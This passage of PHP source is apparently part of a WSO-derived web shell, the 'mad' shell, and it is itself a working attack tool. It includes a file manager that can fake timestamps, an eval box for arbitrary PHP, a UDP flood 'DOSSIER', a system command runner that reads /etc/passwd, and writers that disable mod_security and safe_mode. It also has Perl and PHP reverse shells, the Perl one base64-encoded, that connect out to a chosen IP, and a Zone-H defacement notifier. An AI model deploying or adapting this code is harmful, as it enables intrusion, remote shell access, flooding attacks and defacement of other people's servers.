 607                                     if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
 608                                             echo "Can't upload file!";
 609                                     break;
 610                             case 'mkdir':
 611                                     if(!@mkdir($_POST['p2']))
 612                                             echo "Can't create new dir";
 613                                     break;
 614                             case 'delete':
 615                                     function deleteDir($path) {
 616                                             $path = (substr($path,-1)=='/') ? $path:$path.'/';
 617                                             $dh  = opendir($path);
 618                                             while ( ($item = readdir($dh) ) !== false) {
 619                                                     $item = $path.$item;
 620                                                     if ( (basename($item) == "..") || (basename($item) == ".") )
 621                                                             continue;
 622                                                     $type = filetype($item);
 623                                                     if ($type == "dir")
 624                                                             deleteDir($item);
 625                                                     else
 626                                                             @unlink($item);
 627                                             }
 628                                             closedir($dh);
 629                                             @rmdir($path);
 630                                     }
 631                                     if(is_dir(@$_POST['p2']))
 632                                     deleteDir(@$_POST['p2']);
 633                                     else
 634                                     @unlink(@$_POST['p2']);
 635                                     break;
 636                     default:
 637                     if(!empty($_POST['p1'])) {
 638                                             $_SESSION['act'] = @$_POST['p1'];
 639                                             $_SESSION['f'] = @$_POST['f'];
 640                                             foreach($_SESSION['f'] as $k => $f)
 641                                                     $_SESSION['f'][$k] = urldecode($f);
 642                                             $_SESSION['c'] = @$_POST['c'];
 643                                     }
 644                                     break;
 645                     }
 646             }
 647             $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
 648             if($dirContent === false) {     echo '<h3><span>|  Access Denied! |</span></h3></div>';madFooter(); return; }
 649             global $sort;
 650             $sort = array('name', 1);
 651             if(!empty($_POST['p1'])) {
 652                     if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
 653                             $sort = array($match[1], (int)$match[2]);
 654             }
 655     echo "
 656     <table width='100%' class='main' cellspacing='0' cellpadding='2'  >
 657     <form name=files method=post><tr><th>Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>";
 658             $dirs = $files = array();
 659             $n = count($dirContent);
 660             for($i=0;$i<$n;$i++) {
 661                     $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
 662                     $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
 663                     $tmp = array('name' => $dirContent[$i],
 664                                              'path' => $GLOBALS['cwd'].$dirContent[$i],
 665                                              'modify' => @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])),
 666                                              'perms' => madPermsColor($GLOBALS['cwd'] . $dirContent[$i]),
 667                                              'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
 668                                              'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
 669                                              'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
 670                                             );
 671                     if(@is_file($GLOBALS['cwd'] . $dirContent[$i]))
 672                             $files[] = array_merge($tmp, array('type' => 'file'));
 673                     elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i]))
 674                             $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
 675                     elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&& ($dirContent[$i] != "."))
 676                             $dirs[] = array_merge($tmp, array('type' => 'dir'));
 677             }
 678             $GLOBALS['sort'] = $sort;
 679             function wsoCmp($a, $b) {
 680                     if($GLOBALS['sort'][0] != 'size')
 681                             return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
 682                     else
 683                             return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
 684             }
 685             usort($files, "wsoCmp");
 686             usort($dirs, "wsoCmp");
 687             $files = array_merge($dirs, $files);
 688             $l = 0;
 689             foreach($files as $f) {
 690                     echo '<tr'.($l?' class=l1':'').'><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" title=' . $f['link'] . '><b>| ' . htmlspecialchars($f['name']) . ' |</b>').'</a></td><td>'.(($f['type']=='file')?madSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
 691                             .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'<a href="#" onclick="g(\'FilesMan\',null,\'delete\', \''.urlencode($f['name']).'\')"> X </a></td></tr>';
 692                     $l = $l?0:1;
 693             }
 694             echo "<tr><td colspan=7>
 695             <input type=hidden name=a value='FilesMan'>
 696             <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
 697             <input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
 698             </form></table></div>";
 699 
 700 
 701         madfooter();
 702      }
 703 
 704       function madFilesTools() {
 705             if( isset($_POST['p1']) )
 706                     $_POST['p1'] = urldecode($_POST['p1']);
 707             if(@$_POST['p2']=='download') {
 708                     if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
 709                             ob_start("ob_gzhandler", 4096);
 710                             header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
 711                             if (function_exists("mime_content_type")) {
 712                                     $type = @mime_content_type($_POST['p1']);
 713                                     header("Content-Type: " . $type);
 714                             } else
 715                     header("Content-Type: application/octet-stream");
 716                             $fp = @fopen($_POST['p1'], "r");
 717                             if($fp) {
 718                                     while(!@feof($fp))
 719                                             echo @fread($fp, 1024);
 720                                     fclose($fp);
 721                             }
 722                     }exit;
 723             }
 724             if( @$_POST['p2'] == 'mkfile' ) {
 725                     if(!file_exists($_POST['p1'])) {
 726                             $fp = @fopen($_POST['p1'], 'w');
 727                             if($fp) {
 728                                     $_POST['p2'] = "edit";
 729                                     fclose($fp);
 730                             }
 731                     }
 732             }
 733 
 734        madhead();
 735             echo '<div class=header>';
 736             if( !file_exists(@$_POST['p1']) ) {
 737                     echo "<pre class=ml1 style='margin-top:5px'>FILE DOEST NOT EXITS </pre></div>";
 738                     madFooter();
 739                     return;
 740             }
 741             $uid = @posix_getpwuid(@fileowner($_POST['p1']));
 742             if(!$uid) {
 743                     $uid['name'] = @fileowner($_POST['p1']);
 744                     $gid['name'] = @filegroup($_POST['p1']);
 745             } else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
 746             echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?madSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.madPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
 747             echo '<br>';
 748             if( empty($_POST['p2']) )
 749                     $_POST['p2'] = 'view';
 750             if( is_file($_POST['p1']) )
 751                     $m = array('View', 'Highlight', 'Download', 'Edit', 'Chmod', 'Rename', 'Touch');
 752             else
 753                     $m = array('Chmod', 'Rename', 'Touch');
 754             foreach($m as $v)
 755                     echo '<a  href=# onclick="g(null,null,null,\''.strtolower($v).'\')"><span>'.((strtolower($v)==@$_POST['p2'])?'<b><span> '.$v.' </span> </b>':$v).' </span></a> ';
 756             echo '<br><br>';
 757             switch($_POST['p2']) {
 758                     case 'view':
 759                             echo '<pre class=ml1>';
 760                             $fp = @fopen($_POST['p1'], 'r');
 761                             if($fp) {
 762                                     while( !@feof($fp) )
 763                                             echo htmlspecialchars(@fread($fp, 1024));
 764                                     @fclose($fp);
 765                             }
 766                             echo '</pre>';
 767                             break;
 768                     case 'highlight':
 769                             if( @is_readable($_POST['p1']) ) {
 770                                     echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
 771                                     $code = @highlight_file($_POST['p1'],true);
 772                                     echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
 773                             }
 774                             break;
 775                     case 'chmod':
 776                             if( !empty($_POST['p3']) ) {
 777                                     $perms = 0;
 778                                     for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
 779                                             $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
 780                                     if(!@chmod($_POST['p1'], $perms))
 781                                             echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
 782                             }
 783                             clearstatcache();
 784                             echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
 785                             break;
 786                     case 'edit':
 787                             if( !is_writable($_POST['p1'])) {
 788                                     echo 'File isn\'t writeable';
 789                                     break;
 790                             }
 791                             if( !empty($_POST['p3']) ) {
 792                                     $time = @filemtime($_POST['p1']);
 793                                     $_POST['p3'] = substr($_POST['p3'],1);
 794                                     $fp = @fopen($_POST['p1'],"w");
 795                                     if($fp) {
 796                                             @fwrite($fp,$_POST['p3']);
 797                                             @fclose($fp);
 798                                             echo 'Saved!<br><script>p3_="";</script>';
 799                                             @touch($_POST['p1'],$time,$time);
 800                                     }
 801                             }
 802                             echo '<form onsubmit="g(null,null,null,null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
 803                             $fp = @fopen($_POST['p1'], 'r');
 804                             if($fp) {
 805                                     while( !@feof($fp) )
 806                                             echo htmlspecialchars(@fread($fp, 1024));
 807                                     @fclose($fp);
 808                             }
 809                             echo '</textarea><input type=submit value=">>"></form>';
 810                             break;
 811                     case 'hexdump':
 812                             $c = @file_get_contents($_POST['p1']);
 813                             $n = 0;
 814                             $h = array('00000000<br>','','');
 815                             $len = strlen($c);
 816                             for ($i=0; $i<$len; ++$i) {
 817                                     $h[1] .= sprintf('%02X',ord($c[$i])).' ';
 818                                     switch ( ord($c[$i]) ) {
 819                                             case 0:  $h[2] .= ' '; break;
 820                                             case 9:  $h[2] .= ' '; break;
 821                                             case 10: $h[2] .= ' '; break;
 822                                             case 13: $h[2] .= ' '; break;
 823                                             default: $h[2] .= $c[$i]; break;
 824                                     }
 825                                     $n++;
 826                                     if ($n == 32) {
 827                                             $n = 0;
 828                                             if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
 829                                             $h[1] .= '<br>';
 830                                             $h[2] .= "\n";
 831                                     }
 832                             }
 833                             echo '<table cellspacing=1 cellpadding=5 bgcolor=black><tr><td bgcolor=gray><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
 834                             break;
 835                     case 'rename':
 836                             if( !empty($_POST['p3']) ) {
 837                                     if(!@rename($_POST['p1'], $_POST['p3']))
 838                                             echo 'Can\'t rename!<br>';
 839                                     else
 840                                             die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
 841                             }
 842                             echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
 843                             break;
 844                     case 'touch':
 845                             if( !empty($_POST['p3']) ) {
 846                                     $time = strtotime($_POST['p3']);
 847                                     if($time) {
 848                                             if(!touch($_POST['p1'],$time,$time))
 849                                                     echo 'Fail!';
 850                                             else
 851                                                     echo 'Touched!';
 852                                     } else echo 'Bad time format!';
 853                             }
 854                             clearstatcache();
 855                             echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
 856                             break;
 857             }
 858             echo '</div>';
 859             madFooter();
 860     }  
 861 
 862     function madphpeval()
 863     {
 864         madhead();
 865 
 866         if(isset($_POST['p2']) && ($_POST['p2'] == 'ini')) {
 867                     echo '<div class=header>';
 868                     ob_start();
 869                     $INI=ini_get_all();
 870     print '<table border=0><tr>'
 871             .'<td class="listing"><font class="highlight_txt">Param</td>'
 872             .'<td class="listing"><font class="highlight_txt">Global value</td>'
 873             .'<td class="listing"><font class="highlight_txt">Local Value</td>'
 874             .'<td class="listing"><font class="highlight_txt">Access</td></tr>';
 875     foreach ($INI as $param => $values)
 876             print "\n".'<tr>'
 877                     .'<td class="listing"><b>'.$param.'</td>'
 878                     .'<td class="listing">'.$values['global_value'].' </td>'
 879                     .'<td class="listing">'.$values['local_value'].' </td>'
 880                     .'<td class="listing">'.$values['access'].' </td></tr>';
 881                     $tmp = ob_get_clean();
 882             $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
 883                     $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
 884                     echo str_replace('<h1','<h2', $tmp) .'</div><br>';
 885             }
 886 
 887         if(isset($_POST['p2']) && ($_POST['p2'] == 'info')) {
 888                     echo '<div class=header><style>.p {color:#000;}</style>';
 889                     ob_start();
 890                     phpinfo();
 891                     $tmp = ob_get_clean();
 892             $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
 893                     $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
 894                     echo str_replace('<h1','<h2', $tmp) .'</div><br>';
 895             }
 896 
 897         if(isset($_POST['p2']) && ($_POST['p2'] == 'exten')) {
 898                     echo '<div class=header>';
 899                     ob_start();
 900                  $EXT=get_loaded_extensions ();
 901          print '<table border=0><tr><td class="listing">'
 902             .implode('</td></tr>'."\n".'<tr><td class="listing">', $EXT)
 903             .'</td></tr></table>'
 904             .count($EXT).' extensions loaded';
 905 
 906 
 907             echo '</div><br>';
 908             }
 909 
 910 
 911             if(empty($_POST['ajax']) && !empty($_POST['p1']))
 912                     $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false;
 913         echo '<div class=header><Center><a href=# onclick="g(\'phpeval\',null,\'\',\'ini\')">| INI_INFO | </a><a href=# onclick="g(\'phpeval\',null,\'\',\'info\')">    | phpinfo |</a><a href=# onclick="g(\'phpeval\',null,\'\',\'exten\')">   | extensions  |</a></center><br><form name=pf method=post onsubmit="g(\'phpeval\',null,this.code.value,\'\'); return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><center><input type=submit value=Eval style="margin-top:5px"></center>';
 914             echo '</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
 915             if(!empty($_POST['p1'])) {
 916                     ob_start();
 917                     eval($_POST['p1']);
 918                     echo htmlspecialchars(ob_get_clean());
 919             }
 920             echo '</pre></div>';
 921 
 922         madfooter();
 923     }
 924 
 925     function madhash()
 926     {
 927         if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
 928         if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}}
 929             if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
 930             if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}}
 931             if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
 932             $stringTools = array(
 933                     'Base64 encode' => 'base64_encode',
 934                     'Base64 decode' => 'base64_decode',
 935             'md5 hash' => 'md5',
 936                     'sha1 hash' => 'sha1',
 937                     'crypt' => 'crypt',
 938                     'CRC32' => 'crc32',
 939                     'Url encode' => 'urlencode',
 940                     'Url decode' => 'urldecode',
 941                     'Full urlencode' => 'full_urlencode',
 942                     'Htmlspecialchars' => 'htmlspecialchars',
 943 
 944             );
 945 
 946             madhead();
 947             echo '<div class=header>';
 948             if(empty($_POST['ajax'])&&!empty($_POST['p1']))
 949                     $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
 950             echo "<form  onSubmit='g(null,null,this.selectTool.value,this.input.value); return false;'><select name='selectTool'>";
 951             foreach($stringTools as $k => $v)
 952                     echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
 953                     echo "</select><input type='submit' value='>>'/><br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
 954             if(!empty($_POST['p1'])) {
 955                     if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
 956             }
 957             echo "</div>";
 958             madFooter();
 959 
 960     }
 961     function maddos()
 962     {
 963         madhead();
 964         echo '<div class=header>';
 965       if(empty($_POST['ajax'])&&!empty($_POST['p1']))
 966       $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
 967       echo '<center><span>| UDP DOSSIER |</span><br><br><form onSubmit="g(null,null,this.udphost.value,this.udptime.value,this.udpport.value); return false;" method=POST><span>Host :</span><input name="udphost" type="text"  size="25" /><span>Time :</span><input name="udptime" type="text" size="15" /><span>Port :</span><input name="udpport" type="text" size="10" /><input  type="submit" value=">>" /></form></center>';
 968       echo "<pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' >";
 969         if(!empty($_POST['p1']) && !empty($_POST['p2']) && !empty($_POST['p3']))
 970         {
 971              $packets=0;
 972             ignore_user_abort(true);
 973             $exec_time=$_POST['p2'];
 974             $time=time();
 975             $max_time=$exec_time+$time;
 976             $host=$_POST['p1'];
 977             $portudp=$_POST['p3'];
 978             for($i=0;$i<65000;$i++)
 979             {
 980                 $out .= 'X';
 981             }
 982             while(1){
 983 
 984              $packets++;
 985                 if(time() > $max_time){
 986                         break;
 987                 }
 988 
 989                 $fp = fsockopen('udp://'.$host, $portudp, $errno, $errstr, 5);
 990                 if($fp){
 991                         fwrite($fp, $out);
 992                         fclose($fp);
 993                 }
 994                 }
 995              echo "$packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second";
 996              echo "</pre>";
 997         }
 998 
 999         echo '</div>';
1000 
1001         madfooter();
1002     }
1003 
1004     function madproc()
1005     {
1006         madhead();
1007         echo "<Div class=header><center>";
1008         if(empty($_POST['ajax'])&&!empty($_POST['p1']))
1009       $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
1010       if($GLOBALS['sys']=="win")
1011       {
1012         $process=array(
1013         "System Info" =>"systeminfo",
1014         "Active Connections" => "netstat -an",
1015             "Running Services" => "net start",
1016             "User Accounts" => "net user",
1017             "Show Computers" => "net view",
1018         "ARP Table" => "arp -a",
1019         "IP Configuration" => "ipconfig /all"
1020         );
1021         }
1022       else
1023       {
1024         $process=array(
1025         "Process status" => "ps aux",
1026         "Syslog" =>"cat  /etc/syslog.conf",
1027         "Resolv" => "cat  /etc/resolv.conf",
1028         "Hosts" =>"cat /etc/hosts",
1029         "Passwd" =>"cat /etc/passwd",
1030         "Cpuinfo"=>"cat /proc/cpuinfo",
1031         "Version"=>"cat /proc/version",
1032         "Sbin"=>"ls -al /usr/sbin",
1033         "Interrupts"=>"cat /proc/interrupts",
1034         "lsattr"=>"lsattr -va",
1035         "Uptime"=>"uptime",
1036         "Fstab" =>"cat /etc/fstab",
1037         "HDD Space" => "df -h"
1038         );}
1039 
1040         foreach($process as $n => $link)
1041         {
1042             echo '<a href="#" onclick="g(null,null,\''.$link.'\')"> | '.$n.' | </a>';
1043         }
1044         echo "</center>";
1045          if(!empty($_POST['p1']))
1046          {
1047             echo "<pre class='ml1' style='margin-top:5px' >";
1048             echo madEx($_POST['p1']);
1049             echo '</pre>';
1050          }
1051          echo "</div>";
1052          madfooter();
1053          }
1054 
1055     function madsafe()
1056     {
1057         madhead();
1058         echo "<div class=header><center><h3><span>| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |</span></h3>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh  ] files create in following dir<br>| ".$GLOBALS['cwd']." |<br>";
1059         echo '<a href=# onclick="g(null,null,\'php.ini\',null)">| PHP.INI | </a><a href=# onclick="g(null,null,null,\'ini\')">| .htaccess(Mod) | </a><a href=# onclick="g(null,null,null,null,\'sh\')">| .htaccess(perl) | </a></center>';
1060         if(!empty($_POST['p2']) && isset($_POST['p2']))
1061         {
1062         $fil=fopen($GLOBALS['cwd'].".htaccess","w");
1063         fwrite($fil,'<IfModule mod_security.c>
1064     Sec------Engine Off
1065     Sec------ScanPOST Off
1066     </IfModule>');
1067         fclose($fil);
1068        }
1069        if(!empty($_POST['p1'])&& isset($_POST['p1']))
1070        {
1071         $fil=fopen($GLOBALS['cwd']."php.ini","w");
1072           fwrite($fil,'safe_mode=OFF
1073     disable_functions=NONE');
1074          fclose($fil);
1075         }
1076         if(!empty($_POST['p3']) && isset($_POST['p3']))
1077         {
1078         $fil=fopen($GLOBALS['cwd'].".htaccess","w");
1079         fwrite($fil,'Options FollowSymLinks MultiViews Indexes ExecCGI
1080     AddType application/x-httpd-cgi .sh
1081     AddHandler cgi-script .pl
1082     AddHandler cgi-script .pl');
1083          fclose($fil);
1084         }
1085         echo "<br></div>";
1086         madfooter();
1087 
1088     }
1089 
1090     function madconnect()
1091     {
1092      madhead();
1093      $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
1094      echo "<div class=header><center><h3><span>| PERL AND PHP(threads) BACK CONNECT |</span></h3>";
1095      echo "<form  onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\"><span>PERL BACK CONNECT</span><br>IP: <input type='text' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'> Port: <input type='text' name='port' value='443'> <input type=submit value='>>'></form>";
1096      echo "<br><form  onSubmit=\"g(null,null,'php',this.server.value,this.port.value);return false;\"><span>PHP BACK CONNECT</span><br>IP: <input type='text' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'> Port: <input type='text' name='port' value='443'> <input type=submit value='>>'></form></center>";
1097      if(isset($_POST['p1'])) {
1098                     function cf($f,$t) {
1099                             $w = @fopen($f,"w") or @function_exists('file_put_contents');
1100                             if($w){
1101                                     @fwrite($w,@base64_decode($t));
1102                                     @fclose($w);
1103                             }
1104                     }
1105                     if($_POST['p1'] == 'bcp') {
1106                             cf("/tmp/bc.pl",$back_connect_p);
1107                             $out = madEx("perl /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." 1>/dev/null 2>&1 &");
1108                             echo "<pre class=ml1 style='margin-top:5px'>Successfully opened reverse shell to ".$_POST['p2'].":".$_POST['p3']."<br>Connecting...</pre>";
1109                 @unlink("/tmp/bc.pl");
1110                     }
1111             if($_POST['p1']=='php')
1112      {
1113 
1114     @set_time_limit (0);
1115     $ip = $_POST['p2'];
1116     $port =$_POST['p3'];
1117     $chunk_size = 1400;
1118     $write_a = null;
1119     $error_a = null;
1120     $shell = 'uname -a; w; id; /bin/sh -i';
1121     $daemon = 0;
1122     $debug = 0;
1123     echo "<pre class=ml1 style='margin-top:5px'>";
1124 
1125     if (function_exists('pcntl_fork')) {
1126 
1127             $pid = pcntl_fork();
1128 
1129             if ($pid == -1) {
1130                     echo "Cant fork!<br>";
1131                     exit(1);
1132             }
1133 
1134             if ($pid) {
1135                     exit(0);  
1136             }
1137 
1138             if (posix_setsid() == -1) {
1139                     echo "Error: Can't setsid()<br>";
1140                     exit(1);
1141             }
1142 
1143             $daemon = 1;
1144     } else {
1145             echo "WARNING: Failed to daemonise.  This is quite common and not fatal<br>";
1146     }
1147 
1148     chdir("/");
1149 
1150     umask(0);
1151 
1152     $sock = fsockopen($ip, $port, $errno, $errstr, 30);
1153     if (!$sock) {
1154             echo "$errstr ($errno)";
1155             exit(1);
1156     }
1157 
1158 
1159     $descriptorspec = array(
1160        0 => array("pipe", "r"),  
1161        1 => array("pipe", "w"),  
1162        2 => array("pipe", "w")  
1163     );
1164 
1165     $process = proc_open($shell, $descriptorspec, $pipes);
1166 
1167     if (!is_resource($process)) {
1168             echo "ERROR: Can't spawn shell<br>";
1169             exit(1);
1170     }
1171 
1172 
1173     @stream_set_blocking($pipes[0], 0);
1174     @stream_set_blocking($pipes[1], 0);
1175     @stream_set_blocking($pipes[2], 0);
1176     @stream_set_blocking($sock, 0);
1177 
1178     echo "Successfully opened reverse shell to $ip:$port<br>";
1179 
1180     while (1) {
1181             if (feof($sock)) {
1182                     echo "ERROR: Shell connection terminated<br>";
1183                     break;
1184             }
1185 
1186             if (feof($pipes[1])) {
1187                     echo "ERROR: Shell process terminated<br>";
1188                     break;
1189             }
1190 
1191 
1192             $read_a = array($sock, $pipes[1], $pipes[2]);
1193             $num_changed_sockets=@stream_select($read_a, $write_a, $error_a, null);
1194 
1195             if (in_array($sock, $read_a)) {
1196                     if ($debug) echo "SOCK READ<br>";
1197                     $input=fread($sock, $chunk_size);
1198                     if ($debug) echo "SOCK: $input<br>";
1199                     fwrite($pipes[0], $input);
1200             }
1201 
1202             if (in_array($pipes[1], $read_a)) {
1203                     if ($debug) echo "STDOUT READ<br>";
1204                     $input = fread($pipes[1], $chunk_size);
1205                     if ($debug) echo "STDOUT: $input<br>";
1206                     fwrite($sock, $input);
1207             }
1208 
1209 
1210             if (in_array($pipes[2], $read_a)) {
1211                     if ($debug) echo "STDERR READ<br>";
1212                     $input = fread($pipes[2], $chunk_size);
1213                     if ($debug) echo "STDERR: $input<br>";
1214                     fwrite($sock, $input);
1215             }
1216     }
1217 
1218     fclose($sock);
1219     fclose($pipes[0]);
1220     fclose($pipes[1]);
1221     fclose($pipes[2]);
1222     proc_close($process);
1223 
1224     echo "</pre>";
1225     }
1226 
1227     }  
1228      echo "</div>";
1229      madfooter();
1230     }
1231     function ZoneH($url, $hacker, $hackmode,$reson, $site )
1232     {
1233             $k = curl_init();
1234             curl_setopt($k, CURLOPT_URL, $url);
1235             curl_setopt($k,CURLOPT_POST,true);
1236             curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
1237             curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
1238             curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
1239             $kubra = curl_exec($k);
1240             curl_close($k);
1241             return $kubra;
1242     }
1243     function madzoneh()
1244     {
1245         madhead();
1246         if(!function_exists('curl_version'))
1247         {
1248             echo "<pre class=ml1 style='margin-top:5px'><center><font color=red>PHP CURL NOT EXIT</font></center></pre>";
1249         }
1250         echo "<div class=header><center><br>";
1251         echo '<h3><span>|ZONE-H MASS DEFACER |</span></h3>
1252        <form  onSubmit="g(null,null,this.defacer.value,this.hackmode.value,this.domain.value);return false;" >
1253        <span>| Notifier |</span><br>
1254     <input type="text" name=defacer size="40" value="Attacker" /><br>
1255     <select name=hackmode>
1256     <option >--------SELECT--------</option>
1257     <option value="1">known vulnerability (i.e. unpatched system)</option>
1258     <option value="2" >undisclosed (new) vulnerability</option>
1259     <option value="3" >configuration / admin. mistake</option>
1260     <option value="4" >brute force attack</option>
1261     <option value="5" >social engineering</option>
1262     <option value="6" >Web Server intrusion</option>
1263     <option value="7" >Web Server external module intrusion</option>
1264     <option value="8" >Mail Server intrusion</option>
1265     <option value="9" >FTP Server intrusion</option>
1266     <option value="10" >SSH Server intrusion</option>
1267     <option value="11" >Telnet Server intrusion</option>
1268     <option value="12" >RPC Server intrusion</option>
1269     <option value="13" >Shares misconfiguration</option>
1270     <option value="14" >Other Server intrusion</option>
1271     <option value="15" >SQL Injection</option>
1272     <option value="16" >URL Poisoning</option>
1273     <option value="17" >File Inclusion</option>
1274     <option value="18" >Other Web Application bug</option>
1275     <option value="19" >Remote administrative panel access bruteforcing</option>
1276     <option value="20" >Remote administrative panel access password guessing</option>
1277     <option value="21" >Remote administrative panel access social engineering</option>
1278     <option value="22" >Attack against administrator(password stealing/sniffing)</option>
1279     <option value="23" >Access credentials through Man In the Middle attack</option>
1280     <option value="24" >Remote service password guessing</option>
1281     <option value="25" >Remote service password bruteforce</option>
